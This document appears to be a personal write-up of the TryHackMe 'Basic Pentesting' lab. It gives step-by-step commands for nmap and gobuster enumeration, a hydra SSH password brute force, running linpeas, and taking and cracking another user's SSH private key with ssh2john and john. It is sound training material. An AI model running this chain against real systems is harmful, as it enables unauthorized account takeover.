> For the complete documentation index, see [llms.txt](https://www.marialc.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.marialc.com/tryhackme-rooms/basic-pentesting.md).

# Basic Pentesting

Try this challenge in [TryHackMe: **Basic Pentesting**](https://tryhackme.com/r/room/basicpentestingjt)

> In doing this challenge, I learned the following skills and tools:
>
> * **brute forcing** - using <mark style="color:orange;">**hydra**</mark>
> * **hash cracking** - using <mark style="color:orange;">**ssh2john**</mark>, <mark style="color:orange;">**john**</mark>
> * **service enumeration** - using <mark style="color:orange;">**nmap**</mark>, <mark style="color:orange;">**gobuster**</mark>
> * **Linux Enumeration** - using <mark style="color:orange;">**enum4linux**</mark>, <mark style="color:orange;">**linpeas**</mark>

## Web App Testing and Privilege Escalation

### Find the services exposed by the machine

Run <mark style="color:orange;">**nmap**</mark> and save it in basicpentest directory

{% code lineNumbers="true" %}

```bash
mkdir basicpentest
nmap -sC -sV 10.10.X.X -oN basicpentest/initial
```

{% endcode %}

{% hint style="info" %}
Just change the **`10.10.X.X`** to the IP address assigned to your target machine
{% endhint %}

<figure><img src="/files/VKFQD16YLgaz0smswpqI" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/SOMtgDHyScaxMTgnQLjZ" alt="" width="563"><figcaption></figcaption></figure>

Check it in the browser: **`http://10.10.X.X`**

<figure><img src="/files/INop3kcNsnSaiUA38enJ" alt="" width="563"><figcaption></figcaption></figure>

&#x20;Try to **`View Page Source`**. There is a note in green there to <mark style="color:green;">**check their dev note section**</mark>.&#x20;

<figure><img src="/files/sMUT4k7UitTpVJosFOze" alt="" width="563"><figcaption></figcaption></figure>

So let's check if there is a **`/dev`** directory.

<figure><img src="/files/KRhjDoDZ1npUfiBx9ZwG" alt="" width="563"><figcaption></figcaption></figure>

We get **Not Found** responses from both paths, but we can see information disclosure in the responses that are worth noting.

{% hint style="info" %}
**Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80**
{% endhint %}

### What is the name of the hidden directory on the web server (enter name without /)?

Using <mark style="color:orange;">**gobuster**</mark> let's try to figure out what directories are available to the server.

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X
```

{% endcode %}

<figure><img src="/files/HKN2nyk2e0vtntVzEJIh" alt="" width="563"><figcaption></figcaption></figure>

Even without finishing the scan, we get the directory **`/development`**.

When we access the directory, we'll see two text files, **`dev.txt`** and **`j.txt`**. Let's open both.&#x20;

<figure><img src="/files/MijqQCZvofGxLCDjR80B" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/vX9hfzMoirAO47sgWxBv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VJKWD5RrDk76wiYi2RZ4" alt=""><figcaption></figcaption></figure>

### User brute-forcing to find the username & password

We found users `jan` & `kay` via <mark style="color:orange;">**enum4linux**</mark>

```bash
/usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.lo
```

<figure><img src="/files/mzD0f3qm0V4bn56KuBPO" alt="" width="563"><figcaption></figcaption></figure>

Using <mark style="color:orange;">**hydra**</mark>, we now know the password

```bash
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X
```

<figure><img src="/files/YC9nF3yqyaFnUOUV75SU" alt="" width="563"><figcaption></figcaption></figure>

Now that we know jan’s credentials, we used them to log in via SSH

Check folders and see if we can find interesting files

<figure><img src="/files/TVJg2GMfo54FDv1gUJsV" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/jaC8KR04v9LvTmMqAzWf" alt="" width="563"><figcaption></figcaption></figure>

Since most actions led to denied permissions, we ran <mark style="color:orange;">**linpeas**</mark> in the machine to check possible privilege escalation methods.

To copy `linpeas.sh` to the machine in the `/dev/shm` folder:

```bash
scp linpeas.sh jan@10.10.X.X:/tmp
```

<figure><img src="/files/FfdIhdt31dzlGoBJaMdJ" alt="" width="563"><figcaption></figcaption></figure>

Check if the linpeas file is transferred successfully

<figure><img src="/files/SLGE41AxPjTD7lCOdIbT" alt="" width="563"><figcaption></figcaption></figure>

Make linpeas executable:

```bash
chmod +x linpeas.sh 
```

Then execute linpeas:

```bash
./linpeas.sh
```

From the linpeas results, we found private SSH keys in the path `/home/kay/.ssh/id_rsa`

<figure><img src="/files/3YjTj1oFHn7DNRnYNo3c" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/sz4a2ZFD7ApBb7ochwVZ" alt="" width="563"><figcaption></figcaption></figure>

Open the id\_rsa file then copy the contents

```bash
cat id_rsa
```

<figure><img src="/files/33rE7gZDw54IFVXHsOKl" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/v5Kmz92zeT4DuiodRbFl" alt="" width="563"><figcaption></figcaption></figure>

In your Kali machine, paste the contents into a file named `kay_id_rsa`

```bash
nano kay_id_rsa
```

<figure><img src="/files/HD1RgjO0vj1K5wHcpFAs" alt="" width="563"><figcaption></figcaption></figure>

Change the permissions of the file to read-writable only by you

```bash
chmod 600 kay_id_rsa
```

Try logging in to the machine using the user Kay’s id\_rsa

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

<figure><img src="/files/MQx4ZSWU7ozdwJ2aAF6b" alt="" width="563"><figcaption></figcaption></figure>

We find that a passphrase is needed for this file.

To figure out the passphrase for kay’s id\_rsa, we used <mark style="color:orange;">**ssh2john**</mark> in the JohnTheRIpper module

```bash
ssh2john ~/kay_id_rsa
```

<figure><img src="/files/UKS6XOO5IYFIrBFQeoUU" alt="" width="563"><figcaption></figcaption></figure>

We need to save this in a text file to be decrypted via <mark style="color:orange;">**john**</mark>

```bash
ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt
```

<figure><img src="/files/FcBi546nHntsmj2L0Yli" alt="" width="563"><figcaption></figcaption></figure>

Using john, we decrypted the file and got the passphrase

<figure><img src="/files/t7Gm1zCP2yTMKDlgzAPq" alt="" width="563"><figcaption></figcaption></figure>

We can now log in using kay’s credentials

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

{% hint style="success" %}
We opened the **pass.bak** file and then the password was revealed
{% endhint %}

<figure><img src="/files/zZ9HTGwpIu0m1RsVqj2N" alt=""><figcaption></figcaption></figure>
